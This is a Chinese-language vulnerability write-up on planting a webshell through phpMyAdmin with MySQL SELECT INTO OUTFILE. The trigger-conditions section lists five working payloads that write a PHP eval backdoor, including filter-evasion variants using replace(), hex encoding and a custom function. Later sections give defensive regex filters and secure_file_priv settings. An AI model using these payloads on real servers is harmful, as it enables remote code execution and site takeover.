1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考
1. 漏洞描述
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性
0x1: Mysql SQL预编译(PREPARE Syntax)
/* 1. stmt_name: The PREPARE statement prepares a SQL statement and assigns it a name, stmt_name, by which to refer to the statement later. 2. preparable_stmt: preparable_stmt is either a string literal or a user variable that contains the text of the SQL statement. The text must represent a single statement, not multiple statements. */ PREPARE stmt_name FROM preparable_stmt
0x2: Mysql SQL执行(EXECUTE Syntax)
EXECUTE stmt_name [USING @var_name [, @var_name] ...] //After preparing a statement with PREPARE, you execute it with an EXECUTE statement that refers to the prepared statement name. If the prepared statement contains any parameter markers, you must supply a USING clause that lists user variables containing the values to be bound to the parameters.
Relevant Link:
https://dev.mysql.com/doc/refman/5.0/en/prepare.html https://dev.mysql.com/doc/refman/5.0/en/execute.html http://zone.wooyun.org/content/22606
2. 漏洞触发条件
1. 已知phpmyadmin的root密码,即mysql的root密码(phpmyadmin只是通过web方式连接mysql的工具) 1) mysql本身默认的弱口令 2) 通过其他漏洞(例如注入)获得了mysql的root密码 2. 已知网站的物理路径 1) 在phpmyadmin的后台的"变量"tab页面,可以看到mysql的物理路径,从而推测出网站的物理路径 2) 通过其他web漏洞获得网站的物理路径
----1--- DROP TABLE IF EXISTS `a`; Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('xx'); select cmd from a into outfile 'C:/phpStudy/WWW/ali.php' Drop TABLE IF EXISTS a; ----1--- ----2--- select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/exehack.php' ----2--- ----3--- set @strSql = replace("select '<?php @eval($_POST[pass]);?>' outo outfile 'c:/WWW/phpMyAdmin/alibaba.php'","outo","into"); prepare a from @strSql; execute a; ----3--- ----4--- //select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/exehack.php' SET @SQLString = 0x73656c65637420273c3f70687020406576616c28245f504f53545b706173735d293b3f3e27494e544f204f555446494c452027643a2f77616d702f7777772f6578656861636b2e70687027; PREPARE test FROM @SQLString; EXECUTE test; ----4--- ----5--- //declared mysql function use test; delimiter $$ CREATE FUNCTION myFunction (in_string VARCHAR(255)) RETURNS VARCHAR(255) BEGIN DECLARE new_string VARCHAR(255); SET new_string = replace(in_string,"outo","into"); RETURN(new_string); END$$ //hack delimiter ; SET @SQLString = test.myFunction("select '<?php @eval($_POST[pass]);?>' outo outfile 'c:/alibaba.php'"); PREPARE test FROM @SQLString; EXECUTE test; ----5---
Relevant Link:
http://www.exehack.net/681.html http://www.exehack.net/99.html http://www.187299.com/archives/1695
3. 漏洞影响范围
4. 漏洞代码分析
/* this code point is important $import_text is the one that need to be check strictly */ if ($go_sql) { // parse sql query include_once 'libraries/parse_analyze.inc.php'; if (isset($ajax_reload) && $ajax_reload['reload'] === true) { $response = PMA_Response::getInstance(); $response->addJSON('ajax_reload', $ajax_reload); } PMA_executeQueryAndSendQueryResponse( $analyzed_sql_results, false, $db, $table, null, $import_text, null, $analyzed_sql_results['is_affected'], null, null, null, null, $goto, $pmaThemeImage, null, null, null, $sql_query, null, null ); } else if ($result) { // Save a Bookmark with more than one queries (if Bookmark label given). if (! empty($_POST['bkm_label']) && ! empty($import_text)) { PMA_storeTheQueryAsBookmark( $db, $GLOBALS['cfg']['Bookmark']['user'], $import_text, $_POST['bkm_label'], isset($_POST['bkm_replace']) ? $_POST['bkm_replace'] : null ); } $response = PMA_Response::getInstance(); $response->isSuccess(true); $response->addJSON('message', PMA_Message::success($msg)); $response->addJSON( 'sql_query', PMA_Util::getMessage($msg, $sql_query, 'success') ); } else if ($result == false) { $response = PMA_Response::getInstance(); $response->isSuccess(false); $response->addJSON('message', PMA_Message::error($msg)); } else { $active_page = $goto; include '' . $goto; }
5. 防御方法
} elseif (! empty($id_bookmark)) { // run bookmark $import_type = 'query'; $format = 'sql'; } //在文件的最开头进行SQL恶意检测,最大程度地兼容所有pmd的sql解析、执行逻辑 if(preg_match("/select.*into.*(outfile|dumpfile)/sim", $import_text, $matches)) { $erromsg = "request error!" . "</br>" . $matches[0]; die($erromsg); } //file name filter $matchResult = preg_match_all("#(0[xX]){0,1}[0-9a-fA-F]+#", $import_text, $matchs); if($matchResult != 0 && $matchResult != FALSE) { foreach ($matchs[0] as $key => $value) { $hex = substr($value, 2); $import_text_hex = hex2bin($hex); if (preg_match('#.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)#i', strtolower($import_text_hex), $matches_1)) { $pmderromsg = "request error!" . "</br>" . $matches_1[0]; die($pmderromsg); } } }
1. 定义存储过程 2. 定义函数 3. 定义触发器 4. 使用语法预处理编译 /* prepare stmt from 'select count(*) from information_schema.schemata'; 这里待编译的sql语句也可以进行字符变形以此进行bypass execute stmt; */
1. 通过mysql弱口令,进mysql,添加一个账户,开启远程外连 2. 通过mysql命令行连接之后,通过命令行执行sql导出文件
1. 对phpmyadmin的/import.php进行代码层防御,禁止用户执行导出文件相关的GETSHELL 2. 对mysql的弱口令密码进行健康检测,提示管理员修改密码 3. 使用主动防御Hook技术,接管文件系统,禁止mysql进行写xxx.php文件
0x2: 权限ACL控制
Command-Line Format | --secure-file-priv=dir_name |
System Variable | Name | secure_file_priv |
Variable Scope | Global | ||
Dynamic Variable | No | ||
Permitted Values (<= 5.7.5) | Type | string | |
Default | empty |
Valid Values | empty |
dirname |
Permitted Values (>= 5.7.6) | Type | string | |
Default | platform specific |
Valid Values | empty |
dirname |
Relevant Link:
http://php.net/manual/en/function.preg-match.php#111573 http://blog.sina.com.cn/s/blog_3fe961ae01013r8f.html
6. 攻防思考
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